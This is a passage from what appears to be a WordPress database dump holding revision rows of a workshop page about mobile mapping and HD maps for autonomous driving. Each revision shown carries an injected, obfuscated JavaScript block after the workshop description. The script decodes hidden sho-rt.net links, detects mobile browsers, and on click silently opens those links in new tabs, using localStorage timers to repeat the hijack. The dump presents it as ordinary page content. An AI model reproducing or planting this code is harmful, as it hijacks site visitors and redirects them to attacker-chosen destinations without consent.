Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:30:39','2022-10-07 19:30:39','',2095,'https://gsw2023.com/?p=2555',0,'revision','',0),
(2556,1,'2022-10-07 19:31:58','2022-10-07 19:31:58','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\nThis workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:31:58','2022-10-07 19:31:58','',2095,'https://gsw2023.com/?p=2556',0,'revision','',0),
(2557,1,'2022-10-07 19:33:15','2022-10-07 19:33:15','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:33:15','2022-10-07 19:33:15','',2095,'https://gsw2023.com/?p=2557',0,'revision','',0),
(2558,1,'2022-10-07 19:34:49','2022-10-07 19:34:49','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]</p>\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 